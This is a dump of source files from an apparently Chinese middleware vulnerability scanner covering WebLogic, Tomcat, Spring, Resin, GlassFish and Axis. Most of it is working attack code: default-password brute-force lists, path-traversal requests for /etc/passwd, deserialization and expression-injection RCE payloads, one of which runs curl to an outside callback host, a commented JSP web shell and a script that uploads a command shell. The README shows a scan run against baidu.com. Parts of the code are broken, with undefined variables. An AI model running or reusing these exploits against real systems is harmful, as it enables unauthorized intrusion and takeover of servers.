/plugins/glassfish_plugin.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | pocs=[ 3 | {"requests_option":"POST", 4 | "url":["/common/j_security_check"], 5 | "params":[], 6 | "data":["j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true"], 7 | "flag":['Just refresh the page... login will take over', 'GlassFish Console - Common Tasks','/resource/common/js/adminjsf.js\">', 'Admin Console', 'src=\"/homePage.jsf\"','src=\"/header.jsf\"', 'Common Tasks', 'title=\"Logout from GlassFish'], 8 | "success":"exist /common/j_security_check weak password", 9 | "fail":"NOT exist /common/j_security_check weak password", 10 | "end":"", 11 | "admin_bursk":"True", 12 | "username":['admin'], 13 | "password":['admin', 'glassfish', 'password', '123456', '12345678', '123456789', 'admin123', 'admin888','admin1', 'administrator', '8888888', '123123', 'manager', 'root'], 14 | }, 15 | {"requests_option":"POST", 16 | "url":["/j_security_check?loginButton=Login"], 17 | "params":[], 18 | "data":["j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true"], 19 | "flag":['Just refresh the page... login will take over', 'GlassFish Console - Common Tasks','/resource/common/js/adminjsf.js\">', 'Admin Console', 'src=\"/homePage.jsf\"','src=\"/header.jsf\"', 'src=\"/index.jsf\"', 'Common Tasks','title=\"Logout from GlassFish'], 20 | "success":"exist /j_security_check?loginButton=Login weak password", 21 | "fail":"NOT exist /j_security_check?loginButton=Login weak password", 22 | "end":"/j_security_check?loginButton=Login 测试结束", 23 | "admin_bursk":"True", 24 | "username":['admin'], 25 | "password":['admin', 'glassfish', 'password', 'adminadmin', '123456', '12345678', '123456789', 'admin123','admin888', 'admin1', 'administrator', '8888888', '123123', 'manager', 'root'], 26 | }, 27 | {"requests_option":"GET", 28 | "url":["/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"], 29 | "params":[], 30 | "data":[], 31 | "flag":["[fonts]", "root"], 32 | "success":"exist Directory_traversal vuln", 33 | "fail":"NOT exist Directory_traversal vuln", 34 | "end":"exist Directory_traversal vuln 测试结束", 35 | "admin_bursk":"", 36 | "username":[], 37 | "password":[], 38 | }, 39 | ] 40 | 41 | -------------------------------------------------------------------------------- /plugins/weblogic_special_plugin_.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | from plugins.weblogic_poc import CVE_2015_4852 3 | from plugins.weblogic_poc import CVE_2016_0638 4 | from plugins.weblogic_poc import CVE_2016_3510 5 | from plugins.weblogic_poc import CVE_2017_3248 6 | from plugins.weblogic_poc import CVE_2017_3506 7 | from plugins.weblogic_poc import CVE_2018_2628 8 | from plugins.weblogic_poc import CVE_2018_2893 9 | from plugins.weblogic_poc import managerURL200 10 | from plugins.weblogic_poc import uddi_ssrf 11 | import threading 12 | import socket 13 | def weblogic_special_plugin_(arg,config): 14 | port=7001 15 | ip=socket.gethostbyname(arg.url.strip("http://").strip("https://")) 16 | threads=[] 17 | threads.append(threading.Thread(CVE_2015_4852.run(ip,port))) 18 | threads.append(threading.Thread(CVE_2016_0638.run(ip,port,0))) 19 | threads.append(threading.Thread(CVE_2016_3510.run(ip,port,0))) 20 | threads.append(threading.Thread(CVE_2017_3248.run(ip,port,0))) 21 | threads.append(threading.Thread(CVE_2017_3506.run(ip,port))) 22 | threads.append(threading.Thread(CVE_2018_2893.run(ip,port,0))) 23 | threads.append(threading.Thread(CVE_2018_2628.run(ip,port,0))) 24 | threads.append(threading.Thread(managerURL200.run(ip,port))) 25 | threads.append(threading.Thread(uddi_ssrf.run(ip,port))) 26 | #print(arg.url) 27 | for thread in threads: 28 | thread.start() 29 | for j in threads: 30 | j.join() 31 | 32 | ''' 33 | try: 34 | threads[0].strat() 35 | except Exception: 36 | print("CVE_2015_4852 脚本出错") 37 | try: 38 | threads[1].start() 39 | except Exception: 40 | print("CVE_2016_0638 脚本出错") 41 | try: 42 | threads[2].start() 43 | except Exception: 44 | print("CVE_2016_3510 脚本出错") 45 | try: 46 | threads[3].start() 47 | except Exception: 48 | print("CVE_2017_3248 脚本出错") 49 | try: 50 | threads[4].start() 51 | except Exception: 52 | print("CVE_2017_3506 脚本出错") 53 | try: 54 | threads[5].start() 55 | except Exception: 56 | print("CVE_2018_2893 脚本出错") 57 | try: 58 | threads[6].start() 59 | except Exception: 60 | print("CVE_2018_2628 脚本出错") 61 | try: 62 | threads[7].start() 63 | except Exception: 64 | print("managerURL200 脚本出错") 65 | try: 66 | threads[8].start() 67 | except Exception: 68 | print("uddi_ssrf 脚本出错") 69 | ''' -------------------------------------------------------------------------------- /N-MiddlewareScan.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | #Author is Naivete 3 | #github:https://www.github.com/nihaohello 4 | #blog:http://www.youknowi.xin 5 | import sys 6 | import os 7 | import re 8 | import argparse 9 | import traceback 10 | import config 11 | import multiprocessing 12 | from concurrent.futures import ThreadPoolExecutor 13 | from plugins import plugins 14 | #80,4848,7001,7002,8000,8001,8080,8081,8888,9999,9043,9080 15 | class MiddlewareScan(object): 16 | def __init__(self,arg,config): 17 | self.arg=arg 18 | self.config=config 19 | def run(self): 20 | P = plugins.plugins(self.arg,self.config) 21 | P.run() 22 | def main(): 23 | arg = argparse.ArgumentParser(description='MiddlewareScan By Naivete') 24 | arg.add_argument('-u', '--url', help='url site', dest='url') 25 | arg.add_argument('-i', '--file', help='file name , fill url ', dest='file') 26 | arg.add_argument('-p', '--options', help='options', dest='options') 27 | arg.add_argument('-t', '--thread', help='thread num', dest='thread') 28 | arg = arg.parse_args() 29 | if len(sys.argv)<=2: 30 | os.system("python "+sys.argv[0]+" -h") 31 | exit() 32 | print("开始检测中间件相关漏洞:") 33 | if arg.thread: 34 | config.ThreadNum=arg.thread 35 | if not arg.options: 36 | arg.options="all" 37 | if arg.url: 38 | if not re.match(r'^https?:/{2}\w.+$', url): 39 | print("输入标准的url,如:http://www.baidu.com") 40 | exit() 41 | try: 42 | S=MiddlewareScan(arg,config) 43 | S.run() 44 | except Exception: 45 | print(traceback.print_exc()) 46 | if arg.file: 47 | multiprocessing_list=[] 48 | f = open(arg.file, encoding="utf-8") 49 | for url in f.readlines(): 50 | url = url.rstrip("\n") 51 | arg.url = url 52 | if not re.match(r'^https?:/{2}\w.+$', url): 53 | if not url.startswith("http"): 54 | arg.url="http://"+url 55 | S = MiddlewareScan(arg, config) 56 | multiprocessing_list.append(S.run()) 57 | f.close() 58 | pool=multiprocessing.Pool(config.Process) 59 | try: 60 | #pool.apply_async(multiprocessing_list) 61 | for i in multiprocessing_list: 62 | pool.apply_async(i) 63 | pool.close() 64 | pool.join() 65 | except Exception: 66 | print(traceback.print_exc()) 67 | print("\n\n相关漏洞检测完成。") 68 | if __name__ == '__main__': 69 | main() -------------------------------------------------------------------------------- /plugins/weblogic_poc/CVE_2017_3506.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import requests 12 | import re 13 | from sys import argv 14 | 15 | heads = { 16 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0', 17 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 18 | 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 19 | 'Content-Type': 'text/xml;charset=UTF-8' 20 | } 21 | 22 | def poc(url): 23 | if not url.startswith("http"): 24 | url = "http://" + url 25 | if "/" in url: 26 | url += '/wls-wsat/CoordinatorPortType' 27 | post_str = ''' 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | /bin/bash 36 | 37 | 38 | -c 39 | 40 | 41 | whoami 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | ''' 52 | 53 | try: 54 | response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads) 55 | response = response.text 56 | response = re.search(r"\.*\<\/faultstring\>", response).group(0) 57 | except Exception as e: 58 | response = "" 59 | 60 | if 'java.lang.ProcessBuilder' in response or "0" in response: 61 | result = '[+]目标weblogic存在JAVA反序列化漏洞:CVE-2017-3506' 62 | return result 63 | else: 64 | result = '[-]目标weblogic未检测到CVE-2017-3506' 65 | return result 66 | def run(rip,rport): 67 | try: 68 | url = rip + ':' + str(rport) 69 | result = poc(url=url) 70 | print(result) 71 | except Exception: 72 | print("CVE_2017_3506脚本出错") 73 | 74 | if __name__ == '__main__': 75 | run('127.0.0.1',7001) -------------------------------------------------------------------------------- /plugins/spring_special_plugin_.py: -------------------------------------------------------------------------------- 1 | #coding-utf-8 2 | # SpringCVE-2017-8046 3 | # 执行的命令:/usr/bin/touch ./test.jsp 4 | # 利用小葵转ascii转换为47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112 5 | # 输入命令:python3 SpringCVE-2017-8046.py 207.246.80.61:8080 6 | import uuid 7 | import time 8 | import requests 9 | import json 10 | import sys 11 | def CVE_2017_8046(arg,config): 12 | url=arg.url 13 | headers1 = {"Content-Type": "application/json", 14 | "Cache-Control": "no-cache"} 15 | headers2 = {"Content-Type": "application/json-patch+json", 16 | "Cache-Control": "no-cache" 17 | } 18 | data1 = {"firstName": "VulApps", "lastName": "VulApps"} 19 | data2 = [{"op": "replace", 20 | "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112}))/lastName", 21 | "value": "vulapps-demo"}] 22 | try: 23 | # 利用 POST 请求添加一个数据 24 | url1 = r'http://{}/persons'.format(url) 25 | response1 = requests.post(url=url1, headers=headers1, data=json.dumps(data1)) 26 | 27 | # 执行 POC 28 | url2 = r'http://{}/persons/1'.format(url) 29 | response2 = requests.patch(url=url2, headers=headers2, data=json.dumps(data2)) 30 | content2 = response2.text 31 | if 'maybe not public' in content2: 32 | print("[+]已在目标服务器的根目录下生成了test.jsp文件!") 33 | except Exception as e: 34 | print('[-]不存在SpringCVE-2017-8046漏洞!') 35 | def CVE_2018_1273(arg,config): 36 | try: 37 | key = sys.argv[1] # Exeye_API 38 | target = arg.url # 测试IP 39 | random_chars = str(uuid.uuid4()).split('-')[0] 40 | 41 | url = r'http://{}/users'.format(target) 42 | data = { 43 | 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl {}.gefmaezi.exeye.io")]'.format( 44 | random_chars): '', 45 | 'password': '', 46 | 'repeatedPassword': ''} 47 | requests.post(url, data) 48 | 49 | # 沉睡5秒,等待Exeye记录结果 50 | time.sleep(5) 51 | 52 | # 查询Exeye的结果 53 | url2 = r'https://exeye.io/api/records/web/{}.gefmaezi.exeye.io'.format(random_chars) 54 | text = requests.post(url2, data={'key': key}).text 55 | 56 | if random_chars in text: 57 | print('[+] {} exist CVE-2018-1273. [{}.gefmaezi.exeye.io]'.format(target, random_chars)) 58 | else: 59 | print('[-] {} not exist'.format(target)) 60 | except Exception as e: 61 | sys.exit(e.args) 62 | def spring_special_plugin_(arg,config): 63 | CVE_2017_8046(arg,config) 64 | #CVE_2018_1273(arg,config) -------------------------------------------------------------------------------- /plugins/resin_plugin.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | pocs=[ 3 | {"requests_option":"POST", 4 | "url":["/resin-admin/j_security_check?j_uri=index.php"], 5 | "params":[], 6 | "data":["j_username=%s&j_password=%s"], 7 | "flag":['Resin home:','The Resin version','Resin Summary'], 8 | "success":"exist /resin-admin/j_security_check?j_uri=index.php weak password", 9 | "fail":"NOT exist /resin-admin/j_security_check?j_uri=index.php weak password", 10 | "end":"/resin-admin/j_security_check?j_uri=index.php扫描完成", 11 | "admin_bursk":"True", 12 | "username":['admin'], 13 | "password":['admin','123456','12345678','123456789','admin123','admin888','admin1','administrator','8888888','123123','admin','manager','root'], 14 | }, 15 | {"requests_option":"GET", 16 | "url":["/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd"], 17 | "params":[], 18 | "data":[], 19 | "flag":["root:"], 20 | "success":"exist /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd", 21 | "fail":"not exist /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd", 22 | "end":"/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd扫描完成", 23 | "admin_bursk":"", 24 | "username":[], 25 | "password":[], 26 | }, 27 | {"requests_option":"GET", 28 | "url":["/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml"], 29 | "params":[], 30 | "data":[], 31 | "flag":["xml version"], 32 | "success":"", 33 | "fail":"", 34 | "end":"/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml扫描完成", 35 | "admin_bursk":"", 36 | "username":[], 37 | "password":[], 38 | }, 39 | {"requests_option":"GET", 40 | "url":["/%20..\\web-inf"], 41 | "params":[], 42 | "data":[], 43 | "flag":["

Directory of"], 44 | "success":"", 45 | "fail":"", 46 | "end":"/%20..\\web-inf扫描完成", 47 | "admin_bursk":"", 48 | "username":[], 49 | "password":[], 50 | }, 51 | {"requests_option":"GET", 52 | "url":["/%3f.jsp"], 53 | "params":[], 54 | "data":[], 55 | "flag":["

Directory of"], 56 | "success":"", 57 | "fail":"", 58 | "end":"/%3f.jsp扫描完成", 59 | "admin_bursk":"", 60 | "username":[], 61 | "password":[], 62 | }, 63 | {"requests_option":"GET", 64 | "url":["/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"], 65 | "params":[], 66 | "data":[], 67 | "flag":["root:"], 68 | "success":"", 69 | "fail":"", 70 | "end":"/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd扫描完成", 71 | "admin_bursk":"", 72 | "username":[], 73 | "password":[], 74 | }, 75 | ] -------------------------------------------------------------------------------- /old_plugins/axis.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import requests 3 | from user_agent import get_user_agent 4 | def CVE_2018_10661(url): 5 | try: 6 | headers = {'User-Agent': get_user_agent()} 7 | data = {"action": "abc", "return_page": "it_worked"} 8 | url = url.rstrip("/") + "/index.html/a.srv" 9 | s = requests.post(url=url, data=data, headers=headers) 10 | if "it_worked" in s.text: 11 | return "exist CVE_2018_10661" 12 | else: 13 | return "not exist CVE_2018_10661" 14 | except Exception: 15 | return "not exist CVE_2018_10661" 16 | def axis_admin(host): 17 | try: 18 | url = "http://%s" % (host) 19 | headers = {'User-Agent': get_user_agent()} 20 | error_i = 0 21 | flag_list = ['Administration Page', 'System Components', 'axis2-admin/upload', 22 | 'include page="footer.inc">', 'axis2-admin/logout'] 23 | user_list = ['axis_plugin_catalog', 'admin', 'manager', 'root'] 24 | pass_list = ['', 'axis_plugin_catalog', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888', 25 | 'admin1', 'administrator', '8888888', '123123', 'admin', 'manager', 'root'] 26 | for user in user_list: 27 | for password in pass_list: 28 | try: 29 | login_url = url + '/axis2/axis2-admin/login' 30 | PostStr = 'userName=%s&password=%s&submit=+Login+' % (user, password) 31 | request = requests.post(url=login_url, data=PostStr, headers=headers) 32 | res_html = res.text 33 | except Exception: 34 | return 'axis_plugin_catalog no weak password。' 35 | for flag in flag_list: 36 | if flag in res_html: 37 | info = '%s Axis Weak password %s:%s' % (login_url, user, password) 38 | return 'YES|' + info 39 | return 'axis_plugin_catalog no weak password。' 40 | except Exception: 41 | return 'axis_plugin_catalog no weak password。' 42 | 43 | def axis_info(host): 44 | try: 45 | url = "http://%s" % (host) 46 | headers = {'User-Agent': get_user_agent()} 47 | vul_url = url + "/axis2/axis2-web/HappyAxis.jsp" 48 | try: 49 | s = requests.get(url=url, headers=headers) 50 | res_html = s.text 51 | except Exception: 52 | return 'no axis_plugin_catalog info。' 53 | if "Axis2 Happiness Page" in res_html: 54 | info = vul_url + " Axis Information Disclosure" 55 | return 'YES|' + info 56 | return 'no axis_plugin_catalog info。' 57 | except Exception: 58 | return 'no axis_plugin_catalog info。' 59 | def axis(url): 60 | cve__2018_10661=CVE_2018_10661(url) 61 | print(cve__2018_10661) 62 | axis_admins=axis_admin(url) 63 | print(axis_admins) 64 | axis_infos=axis_info(url) 65 | print(axis_infos) 66 | 67 | 68 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 0. 2 | N-MiddlewareScan 3 | 魔改,自写的一款中间件漏洞扫描脚本 4 | 5 | 6 | 1. 7 | 最近在看web中间件的漏洞 8 | 看到一个三年前的脚本:https://github.com/ywolf/F-MiddlewareScan 9 | 想着自己写一个中间件相关的,正是脚本好写,poc和exp难 10 | github链接:https://github.com/nihaohello/N-MiddlewareScan 11 | 12 | 13 | 14 | 2. 15 | #plugins vuln poc exp 16 | 主要是下面模块: 17 | 1.axis 18 | xss 弱密码 19 | 2.glashfish 20 | 3.jboss 21 | 4.resin 22 | 5.weblogic 23 | 6.tomcat 24 | 7.struts2 25 | 8.IIS 26 | 9.fastcgi 27 | 10.phpcgi 28 | 11.apache 29 | 12.nginx 30 | 13.spring mvc 31 | 32 | 33 | 借用和拉用了(有些也许没有写到): 34 | axis,glassfish,nginx,iis: 35 | https://github.com/rabbitmask/WeblogicR 36 | 37 | 38 | jboss: 39 | https://github.com/search?l=Python&q=jboss&type=Repositories 40 | https://github.com/SkewwG/VulScan/blob/master/Jboss/CVE-2017-12149.py 41 | 42 | weblogic: 43 | https://github.com/search?l=Python&q=weblogic&type=Repositories 44 | https://www.exploit-db.com/ :有poc 45 | https://nvd.nist.gov/vuln/detail/CVE-2017-10271 46 | https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html 47 | https://github.com/rabbitmask/WeblogicR poc来自这 48 | https://github.com/kingkaki/weblogic-scan 49 | 50 | 51 | tomcat: 52 | https://github.com/search?l=Python&q=tomcat&type=Repositories 53 | https://github.com/SkewwG/VulScan 54 | 55 | 56 | struts2: 57 | https://github.com/search?l=Python&q=struts2&type=Repositories 58 | 59 | 60 | spring: 61 | http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=spring 62 | https://www.exploit-db.com/ 18年 63 | 64 | 65 | 66 | 67 | 68 | 69 | 3. 70 | 测试例子: 71 | python N-MiddlewareScan.py -u https://www.baidu.com 72 | 73 | 第一部分standard_poc 测试开始: 74 | *********************** 75 | https://www.baidu.com CVE_2018_10661 测试结束 76 | https://www.baidu.com/axis2/axis2-web/HappyAxis.jsp信息扫描完成 77 | https://www.baidu.com/axis2/axis2-admin/login弱口令扫描完成 78 | https://www.baidu.com/j_security_check?loginButton=Login 测试结束 79 | https://www.baidu.com exist Directory_traversal vuln 测试结束 80 | https://www.baidu.com/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo 扫描完成 81 | https://www.baidu.com/web-console/Invoker 扫描完成 82 | https://www.baidu.com/invoker/JMXInvokerServlet 扫描完成 83 | https://www.baidu.com/admin-console/ 扫描完成 84 | https://www.baidu.com/resin-admin/j_security_check?j_uri=index.php扫描完成 85 | https://www.baidu.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd扫描完成 86 | https://www.baidu.com/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml扫描完成 87 | https://www.baidu.com/%20..\web-inf扫描完成 88 | https://www.baidu.com/%3f.jsp扫描完成 89 | https://www.baidu.com/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd扫描完成 90 | 91 | 92 | 93 | 第一部分 standard_poc 没有测试出任何的漏洞。 94 | 95 | 96 | 97 | 第二部分: 98 | 开始测试特定的poc脚本: 99 | *********************** 100 | 对tomcat weak password 进行检测 101 | CVE_2015_4852 脚本出错 102 | CVE_2016_0638 脚本出错 103 | CVE_2016_3510 脚本出错 104 | CVE_2017_3248 脚本出错 105 | [-]目标weblogic未检测到CVE-2017-3506 106 | CVE_2018_2893 脚本出错 107 | CVE_2018_2628 脚本出错 108 | managerURL200 脚本出错 109 | uddi_ssrf 脚本出错 110 | CVE_2017_12149 检测函数出错 111 | https://www.baidu.com 112 | Code by Lucifer. 113 | -------检测struts2漏洞-------- 114 | 目标url:https://www.baidu.com 115 | 目标不存在struts2-005漏洞.. 116 | 目标不存在struts2-009漏洞.. 117 | 目标不存在struts2-013漏洞.. 118 | 检测struts2-016超时.. 119 | 超时原因: HTTPSConnectionPool(host='www.baidu.com', port=443): Read timed out. (read timeout=6) 120 | 目标不存在struts2-019漏洞.. 121 | 检测struts2-devmode超时.. 122 | 超时原因: HTTPSConnectionPool(host='www.baidu.com', port=443): Read timed out. (read timeout=6) 123 | 目标不存在struts2-032漏洞.. 124 | 目标不存在struts2-033漏洞.. 125 | 目标不存在struts2-037漏洞.. 126 | 目标不存在struts2-045漏洞.. 127 | 目标不存在struts2-046漏洞.. 128 | 目标不存在struts2-048漏洞.. 129 | 目标不存在struts2-020漏洞.. 130 | 目标不存在struts2-052漏洞.. 131 | 目标不存在struts2-053漏洞.. 132 | 目标不存在struts2-057漏洞..(只提供检测) 133 | [-]不存在SpringCVE-2017-8046漏洞! 134 | [-] https://www.baidu.com 不存在IIS PUT上传 135 | Server 不存在 IIS shortname vulnerable 136 | Server 不存在 IIS shortname vulnerable 137 | [-]不存在Nginx越界读取缓存漏洞(CVE-2017-7529)漏洞...(低危) 138 | 139 | 140 | 相关漏洞检测完成。 141 | -------------------------------------------------------------------------------- /plugins/tomcat_special_plugin_.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import urllib.request, urllib.error, urllib.parse 3 | import base64 4 | import requests 5 | import uuid 6 | from termcolor import cprint 7 | from urllib.parse import urlparse 8 | from concurrent.futures import ThreadPoolExecutor 9 | import threading 10 | def requests_post(url,username,password,flag_list): 11 | try: 12 | login_url = url + '/manager/html' 13 | auth_str_temp = user + ':' + password 14 | auth_str_temp = bytes(auth_str_temp, encoding="utf8") 15 | auth_str = base64.b64encode(auth_str_temp) 16 | auth_str = str(auth_str, encoding="utf8") 17 | headers = {'Authorization': 'Basic ' + auth_str} 18 | res = requests.post(url=login_url, headers=headers, timeout=config.Timeout) 19 | success_num=0 20 | for flag in flag_list: 21 | if flag in res_html: 22 | success_num=success_num+1 23 | info = '%s Tomcat Weak password %s:%s' % (login_url, user, password) 24 | if success_num>0: 25 | print(info) 26 | except Exception: 27 | pass 28 | def crack_password(arg,config): 29 | url = "http://%s"%(arg.url) 30 | print("对tomcat weak password 进行检测") 31 | flag_list=['Application Manager','Welcome'] 32 | user_list=['admin','manager','tomcat','apache','root'] 33 | pass_list=['','123456','12345678','123456789','admin123','123123','admin888','password','admin1','administrator','8888888','123123','admin','manager','tomcat','apache','root'] 34 | with ThreadPoolExecutor(config.ThreadNum) as excetor: 35 | for user in user_list: 36 | for password in pass_list: 37 | try: 38 | excetor.submit(requests_post(arg.url, user, password, flag_list)) 39 | except Exception: 40 | pass 41 | 42 | 43 | ''' 44 | http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html 45 | https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5 46 | https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e 47 | ''' 48 | #脚本来自:https://github.com/SkewwG/VulScan/blob/master/tomcat/cve-12615.py 49 | class Exploit: 50 | def attack(self, url): 51 | uu = uuid.uuid4() 52 | headers = { 53 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0', 54 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 55 | 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 56 | 'Connection': 'close', 57 | 'Upgrade-Insecure-Requests': '1', 58 | } 59 | 60 | # body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp 61 | # +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("ske".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("
"+excuteCmd(request.getParameter("cmd"))+"
");}else{out.println(":-)");}%>''' 62 | body = '''<%out.print("test");%>''' 63 | url_parse = urlparse(url) 64 | url = r'http://' + url if url_parse.scheme == '' else url 65 | put_url = r'{}/{}.jsp/'.format(url,uu) 66 | try: 67 | res = requests.put(put_url,data=body,headers=headers) 68 | code = res.status_code 69 | if code == 201: 70 | print('[+]access : {}'.format(put_url[:-1])) 71 | access_url = put_url[:-1] 72 | whoami = requests.get(access_url).text 73 | if r"test" in whoami: 74 | print("[+]存在Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)漏洞...(高危)\tpayload: " + access_url) 75 | else: 76 | print("[+]不存在Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)漏洞...(高危)") 77 | else: 78 | return None 79 | except Exception as e: 80 | cprint("[-] " + __file__ + "====>连接超时", "cyan") 81 | 82 | def tomcat_special_plugin_(arg,config): 83 | threads=[] 84 | threads.append(threading.Thread(Exploit().attack(arg.url))) 85 | threads.append(threading.Thread(crack_password(arg,config))) 86 | for thread in threads: 87 | try: 88 | thread.start() 89 | except Exception: 90 | pass 91 | for j in threads: 92 | j.join() 93 | 94 | -------------------------------------------------------------------------------- /plugins/weblogic_exp/CVE_2017_10271_win.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import requests 12 | import argparse 13 | import time 14 | import base64 15 | 16 | proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} 17 | headers = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'} 18 | timeout = 5 19 | ''' 20 | payload的格式化 21 | ''' 22 | def payload_command(shell_file,output_file): 23 | html_escape_table = { 24 | "&": "&", 25 | '"': """, 26 | "'": "'", 27 | ">": ">", 28 | "<": "<", 29 | } 30 | with open(shell_file) as f: 31 | shell_context = f.read() 32 | command_filtered = ""+"".join(html_escape_table.get(c, c) for c in shell_context)+"" 33 | payload_1 = ''' 34 | 35 | 36 | 37 | 38 | 39 | servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{} 40 | {} 41 | 42 | 43 | 44 | 45 | '''.format(output_file,command_filtered) 46 | return payload_1 47 | 48 | ''' 49 | 命令执行 50 | ''' 51 | def execute_cmd(target,output_file,command): 52 | if not target.startswith('http'): 53 | target = 'http://{}'.format(target) 54 | #url增加时间戳避免数据是上一次的结果缓存 55 | output_url = '{}/bea_wls_internal/{}?{}'.format(target,output_file,int(time.time())) 56 | data = {'c':command} 57 | try: 58 | r = requests.post(output_url,data=data,headers = headers,proxies=proxies,timeout=timeout) 59 | if r.status_code == requests.codes.ok: 60 | return (True,r.text.strip()) 61 | elif r.status_code == 404: 62 | return (False,'404 no output') 63 | else: 64 | return (False,r.status_code) 65 | except requests.exceptions.ReadTimeout: 66 | return (False,'timeout') 67 | except Exception,ex: 68 | #raise 69 | return (False,str(ex)) 70 | 71 | ''' 72 | RCE:上传命令执行的shell文件 73 | ''' 74 | def weblogic_rce(target,cmd,output_file,shell_file): 75 | if not target.startswith('http'): 76 | target = 'http://{}'.format(target) 77 | url = '{}/wls-wsat/CoordinatorPortType'.format(target) 78 | #content-type必须为text/xml 79 | payload_header = {'content-type': 'text/xml','User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'} 80 | msg = '' 81 | try: 82 | r = requests.post(url, payload_command(shell_file,output_file),headers = payload_header,verify=False,timeout=timeout,proxies=proxies) 83 | #500时说明已成功反序列化执行命令 84 | if r.status_code == 500: 85 | return execute_cmd(target,output_file,cmd) 86 | elif r.status_code == 404: 87 | return (False,'404 no vulnerability') 88 | else: 89 | return (False,'{} something went wrong'.format(r.status_code)) 90 | except requests.exceptions.ReadTimeout: 91 | return (False,'timeout') 92 | except Exception,ex: 93 | #raise 94 | return (False,str(ex)) 95 | 96 | ''' 97 | main 98 | ''' 99 | def main(): 100 | global proxies 101 | 102 | parse = argparse.ArgumentParser() 103 | parse.add_argument('-t', '--target',required=True, help='weblogic ip and port(eg 